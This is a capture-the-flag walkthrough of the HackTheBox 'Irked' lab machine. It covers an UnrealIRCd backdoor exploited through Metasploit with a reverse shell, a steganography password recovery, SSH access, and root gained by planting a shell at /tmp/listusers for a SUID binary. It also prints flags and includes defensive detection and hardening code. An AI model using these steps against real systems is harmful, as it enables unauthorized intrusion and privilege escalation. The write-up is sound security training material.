Hackthebox - Irked

Box information

Box type

Information gathering

Nmap

┌──(root💀lucifiel)-[~/Desktop]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.10.117
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-29 10:23 CST
Nmap scan report for 10.10.10.117
Host is up (0.17s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          49297/tcp   status
|   100024  1          50541/udp   status
|   100024  1          51791/udp6  status
|_  100024  1          60368/tcp6  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
49297/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Network Distance: 2 hops
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 143/tcp)
HOP RTT       ADDRESS
1   170.14 ms 10.10.14.1
2   170.23 ms 10.10.10.117

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.84 seconds

Port 111 is open here. It looks like an rpcbind vulnerability, apparently something buffer-overflow related; let's check it with msf.

Metasploit

msf6 auxiliary(scanner/misc/sunrpc_portmapper) > show options 

Module options (auxiliary/scanner/misc/sunrpc_portmapper):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PROTOCOL  tcp              yes       Protocol to use (Accepted: tcp, udp)
   RHOSTS    10.10.10.117     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     111              yes       The target port (TCP)
   THREADS   1                yes       The number of concurrent threads (max one per host)

With the options set, run it:

msf6 auxiliary(scanner/misc/sunrpc_portmapper) > exploit 

[+] 10.10.10.117:111      - SunRPC Programs for 10.10.10.117
================================

 Name     Number  Version  Port   Protocol
 ----     ------  -------  ----   --------
 rpcbind  100000  4        111    tcp
 rpcbind  100000  3        111    tcp
 rpcbind  100000  2        111    tcp
 rpcbind  100000  4        111    udp
 rpcbind  100000  3        111    udp
 rpcbind  100000  2        111    udp
 status   100024  1        50541  udp
 status   100024  1        49297  tcp

[*] 10.10.10.117:111      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The scan found the services, but exploitation did not succeed; let's move on and look elsewhere.

HTTP

The web service says IRC is working, and ports 6697, 8067 and 65534 all appear to be IRC services. Let's look up what IRC is.

According to the wiki, IRC is an application-layer protocol used mainly for group chat, usually on ports 6667 and 6697, and we have 6697 open here.

Exploitation

msf6 > search Unreal

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/linux/games/ut2004_secure           2004-06-18       good       Yes    Unreal Tournament 2004 "secure" Overflow (Linux)
   1  exploit/windows/games/ut2004_secure         2004-06-18       good       Yes    Unreal Tournament 2004 "secure" Overflow (Win32)
   2  exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  No     UnrealIRCD 3.2.8.1 Backdoor Command Execution

Interact with a module by name or index. For example info 2, use 2 or use exploit/unix/irc/unreal_ircd_3281_backdoor

The msf search turned up a module; let's use it.

msf6 > use 2
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options 

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   6667             yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

Set RHOSTS and run it:

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse
payload => cmd/unix/reverse

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 10.10.10.117
rhosts => 10.10.10.117

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set lhost 10.10.16.12
lhost => 10.10.16.12

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 6697
rport => 6697
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit 

[*] Started reverse TCP double handler on 10.10.16.12:4444 
[*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
    :irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:6697 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo SUUjSBbQaAoSC5R9;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "SUUjSBbQaAoSC5R9\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.16.12:4444 -> 10.10.10.117:51640) at 2022-04-28 22:55:02 -0400

whoami&&id
ircd
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)

Next, use shell to drop into a shell session, then spawn a pty with python3:

shell
python3 -c "import pty;pty.spawn('/bin/bash')"
ircd@irked:/home/djmardov/Documents$ ls -la
ls -la
total 16
drwxr-xr-x  2 djmardov djmardov 4096 May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov  3  2018 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt

Slightly odd: this is clearly a Linux system, yet the djmardov user's home directory has a Windows-style layout.

In /home/djmardov/Documents there is the user.txt flag, but we do not have permission to read it. There is also a .backup file that we can read; let's see what it is.
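The foothold above came through the UnrealIRCd 3.2.8.1 backdoor, whose trigger is client input beginning with "AB;", which is not a valid IRC command. As an added defensive example (not part of the original writeup), the Python below parses client lines against the RFC 1459 message grammar and flags anything that does not parse, so a sensor in front of the IRC ports can alert on such input; the sample lines are constructed, except the NOTICE line taken from the session output above.

```python
import re

# RFC 1459 message: [":" prefix SPACE] command [SPACE params] [" :" trailing]
# The command token is letters only, or exactly three digits (numeric reply).
_MESSAGE_RE = re.compile(r"^(?::(\S+) )?([A-Za-z]+|[0-9]{3})(?: (.*))?$")
_MAX_LINE = 512  # RFC 1459 limit, CRLF included


def parse_irc_line(line):
    """Return (prefix, COMMAND, params) for a well-formed line, else None."""
    line = line.rstrip("\r\n")
    if not line or len(line) + 2 > _MAX_LINE:
        return None
    m = _MESSAGE_RE.match(line)
    if m is None:
        return None
    prefix, command, rest = m.groups()
    params = []
    if rest is not None:
        if rest.startswith(":"):          # only a trailing parameter
            middle, trailing = "", rest[1:]
        else:
            middle, sep, trailing = rest.partition(" :")
            if not sep:
                trailing = None
        params = middle.split()
        if trailing is not None:
            params.append(trailing)
    return prefix, command.upper(), params


def flag_suspicious(lines):
    """Lines that do not parse as IRC commands. The 3.2.8.1 backdoor is
    triggered by client input starting with 'AB;', which no legitimate
    client sends, so these lines are worth an alert on the IRC ports."""
    return [ln for ln in lines if parse_irc_line(ln) is None]


# Constructed sample traffic; the NOTICE line is the one shown in the
# Metasploit session output above.
SAMPLE_LINES = [
    "NICK alice",
    "USER alice 0 * :Alice Example",
    ":irked.htb NOTICE AUTH :*** Looking up your hostname...",
    "PRIVMSG #irked :hello",
    "AB;id",
]

if __name__ == "__main__":
    for bad in flag_suspicious(SAMPLE_LINES):
        print("ALERT: non-IRC input from client: %r" % bad)
```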

Privilege escalation

User

ircd@irked:/home/djmardov/Documents$ cat .backup
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

Trying to log in to the djmardov account with this password directly does not work; it just fails.

Looking at the hint, this seems to be a steg password, but we have no file to decrypt. Then I remembered: where are passwords usually hidden? In images, of course. And where is there an image? The HTTP service's home page has one!

┌──(root💀kali)-[~/Desktop]
└─# steghide extract -sf irked.jpg
Enter passphrase: 
wrote extracted data to "pass.txt".

It prompts for a passphrase; this is where the password from .backup comes in. After entering it, a pass.txt file is extracted.

┌──(root💀kali)-[~/Desktop]
└─# cat pass.txt
Kab6h+m+bbp2J:HG

This gives us the password.

┌──(root💀kali)-[~/Desktop]
└─# ssh djmardov@10.10.10.117     
djmardov@10.10.10.117's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Apr 28 04:38:52 2022 from 10.10.14.3
djmardov@irked:~$ whoami&&id
djmardov
uid=1000(djmardov) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)

Successfully escalated to the user account.

djmardov@irked:~/Documents$ cat user.txt 
4a66a78b12dc0e661a59d3f5c0267a8e

Got the user flag.

Root

Use find to look for files with special permissions (SUID root):

djmardov@irked:~$ find / -user root -perm -4000 -print 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount

This turns up an unusual /usr/bin/viewuser binary; let's take a look at it.

djmardov@irked:/usr/bin$ ./viewuser 
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2022-04-28 02:46 (:0)
djmardov pts/5        2022-04-28 23:22 (10.10.16.12)
/tmp/listusers: connect: Connection refused

It appears to call /tmp/listusers. The binary is SUID root and /tmp is world-writable, so any local user can create that file and have it executed as root.

Write a shell into /tmp/listusers:

echo "/bin/sh" > /tmp/listusers

Then run /usr/bin/viewuser:

djmardov@irked:/tmp$ echo "/bin/sh" > /tmp/listusers
djmardov@irked:/tmp$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2022-04-28 02:46 (:0)
djmardov pts/5        2022-04-28 23:52 (10.10.16.12)
# whoami&&id
root
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)

Successfully escalated to root.
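The root escalation works because the setuid-root viewuser binary executes a fixed path under the world-writable /tmp. As an added example (not code from the box or this writeup), the Python below shows the check a privileged program should perform before executing a helper: every component of the resolved path must be root-owned and not group/world writable, and the child runs with privileges dropped. mode_is_safe, helper_path_is_trusted and run_helper are names assumed here.

```python
import os
import stat
import subprocess

OTHERS_WRITABLE = stat.S_IWGRP | stat.S_IWOTH


def mode_is_safe(st_mode, st_uid, owner_uid=0):
    """A path component is safe only if owner_uid (root by default) owns it
    and nobody else can write to it. /tmp (root-owned, mode 1777) fails on
    the write bits, which is exactly why /tmp/listusers could be planted."""
    return st_uid == owner_uid and not (st_mode & OTHERS_WRITABLE)


def helper_path_is_trusted(path, owner_uid=0):
    """Resolve symlinks, then check every directory from / down to the
    helper itself; the leaf must also be a regular executable file."""
    real = os.path.realpath(path)
    components, current = [os.sep], os.sep
    for part in real.strip(os.sep).split(os.sep):
        if part:
            current = os.path.join(current, part)
            components.append(current)
    for component in components:
        try:
            st = os.stat(component)
        except OSError:          # missing component: nothing to trust
            return False
        if not mode_is_safe(st.st_mode, st.st_uid, owner_uid):
            return False
    return stat.S_ISREG(st.st_mode) and os.access(real, os.X_OK)


def run_helper(path, owner_uid=0):
    """Hardened replacement for the viewuser pattern (running a hard-coded
    /tmp path while setuid root): verify the helper first, and drop the
    effective uid to the real uid in the child before it executes."""
    if not helper_path_is_trusted(path, owner_uid):
        raise PermissionError("refusing to execute untrusted helper: " + path)
    drop = lambda: os.setuid(os.getuid())  # runs in the child, before exec
    return subprocess.run([path], preexec_fn=drop, check=False).returncode


if __name__ == "__main__":
    # Constructed check against the path the box's viewuser binary uses.
    print("/tmp/listusers trusted:", helper_path_is_trusted("/tmp/listusers"))
```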

# cat /root/root.txt
8d8e9e8be64654b6dccc3bff4522daf3

Got the root flag.